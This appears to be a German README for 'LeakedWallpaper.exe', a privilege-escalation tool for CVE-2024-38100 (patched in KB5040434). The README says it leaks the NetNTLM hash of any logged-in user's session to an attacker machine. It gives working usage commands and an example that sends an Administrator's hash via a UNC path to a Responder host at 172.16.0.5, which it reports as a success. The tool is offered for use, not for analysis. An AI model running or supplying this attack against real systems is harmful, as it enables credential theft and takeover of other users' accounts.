
Leak des NetNTLM-Hashs eines beliebigen Benutzers. Behoben in KB5040434.
Dies ist ein Tool zur Privilege-Escalation (behoben mit CVE-2024-38100 in KB5040434), mit dem wir den NetNTLM-Hash eines Benutzers aus jeder Sitzung auf dem Computer leaken können, selbst wenn wir als Benutzer mit geringen Privilegien arbeiten.
.\LeakedWallpaper.exe <session> \\<KALI IP>\c$\1.jpg [-downgrade]
# Beispiel
.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg -downgrade
Falls blockiert, siehe demo.mkv
Stellen wir uns vor, wir haben zwei Sitzungen auf dem Host:
Aktuelle Sitzungs-ID: 2
Ziel-Sitzungs-ID: 1

Responder-IP: 172.16.0.5
Windows-IP: 172.16.0.2

Holen wir uns mit dem Tool den NetNTLM-Hash des Administrators!
.\LeakedWallpaper 1 \\172.16.0.5\c$\1.jpg
Erfolg!
